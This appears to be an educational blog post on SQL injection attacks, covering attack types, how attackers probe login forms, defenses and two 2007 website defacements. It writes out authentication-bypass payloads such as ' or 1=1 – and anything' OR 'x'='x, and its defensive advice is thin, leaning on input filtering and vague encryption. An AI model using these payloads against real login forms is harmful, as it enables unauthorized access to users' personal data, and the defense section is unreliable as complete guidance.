SQL injection is a type of vulnerability attack which takes advantage of the holes in the database layer of a website. It happens when a user passes arguments to the SQL engine of the application through the regular user input fields. A major cause for the success of this attack is that most website parsers do not validate user inputs before passing it on to SQL for processing. An attacker can make use of this vulnerability and with a little time and patience can gain access to the entire database.
Description of the attack
SQL injection attack can be of many types. The major ones are listed below
• Incorrectly parsed inputs
This happens when a user input is not checked to see if it is a valid input allowed by the users. Statements like 1=1 or ‘x’=’x’ will always be true in an SQL query and thus can be injected to the form fields to bypass authentication process.
• Type invalidation
In other cases the parser does not check the type of data input by the user. An example of this is a text being provided into a date box, and the SQL trying to process this as a number field. In this case if proper error handling and type checking is not done, the database can crash, providing the user with additional details about the database.
• Blind attacks
These are attacks for which the user does not directly see any output on the screen but can infer a large amount of information by the behavior of the database. For example by providing special inputs and calculating the time needed for execution, an attacker can determine if it was a successful attack.
How it is used by hackers
The first step is to determine if the database is vulnerable. This can be done by providing a character such as a quote (‘) or a double quotes (“) in the user name filed. Other similar characters may also be employed for this purpose. If there is a vulnerability in the database, it provides a crash report instead of the usual output of “invalid user name” etc. this would look something like the figure above.
Now that vulnerability has been discovered, an attacker can input other combinations which provide him unauthenticated access. Most databases have “admin” or other variations of it as a user name. This can be used along with passwords which are always true like
anything' OR 'x'='x
‘OR 1=1 –
There are many other combinations which can be used for this purpose. For example the following can be used as credentials: Username: ' or 1=1 – Password: ' or 1=1 –
Yet another example that might work is: Username: me Password: anything' OR 'x'='x
Many other such combinations are available which can be used for this purpose. The important part about this method is that, once the database crash report is obtained (as shown in the figure) it hints the attacker to what type of strings are accepted by it. The attacker can then modify his credentials with these database specific details.
In case of some JavaScript enabled pages, with improper handling of login details, the page source can be saved onto the attacker system. This then can be modified to so that the login validation function calls are removed from the code.
Access provided by a successful attack
An attacker who succeeds in logging in into the system will have access to the information for the specific user. If a he succeeds in logging in as the as “admin” he will have unlimited privileges from viewing the database files to modifying or deleting it. However for a random login, the attacker normally gets logged into the first account found by the SQL search string. In such a case he will have access to the personal information of the user. In both cases the attacker can get complete information about the user, sometimes including the address, phone numbers or even social security numbers.
Defending against SQL attacks
The best method for defending against such attacks is to have the parser validate each and every string input by the user. Characters such as the quotes or the equals (=) should be properly handled. In addition it would be a good idea to keep a check on the length of the user data.
In case of JavaScript enabled page it would be good to have a good encryption technique employed on the website. Moreover it should be made sure that the functions for credential verification should be placed in a different secure location rather than embedding it into the source code for the login page.
Examples of successful attacks
A recent incident of SQL injection attack occurred on August 12, 2007 when the United Nations website was defaced by hackers. They posted their own message on the home page of the UN asking the US and ISRAEL to stop war. An interesting point to be noted in the message posted is that it hardly contains any quotes, not even for the “don’t “This clarifies that it was an SQL injection attack and the quotes would hinder with the commands provided by the attacker.
Another example is the Microsoft UK website which was attacked on the 29 June 2007 where SQL injection is suspected to be the method of attack. The hacker replaced several sections of the website with graphics related to Saudi Arabia. The method is said to have HTML code injected into an SQL engine which used the new code whenever a new page was generated. The attack is said to have taken advantage of a vulnerability associated with Microsoft SQL server.
Conclusion
SQL injection attack is one of the popular and easier types of attack, which can be performed by even a novice with some patience and time. Website developers and database admins should take proper care to make sure that their system is free from these kinds of attacks. This can be done by some of the methods outlined above. Moreover a company interested in preventing these attacks must be ready to provide proper security training to its web and database teams.
References:
Wikipedia
Youtube
http://unixwiz.net
http://hackademix.net
http://rcpmag.com
0 comments:
Post a Comment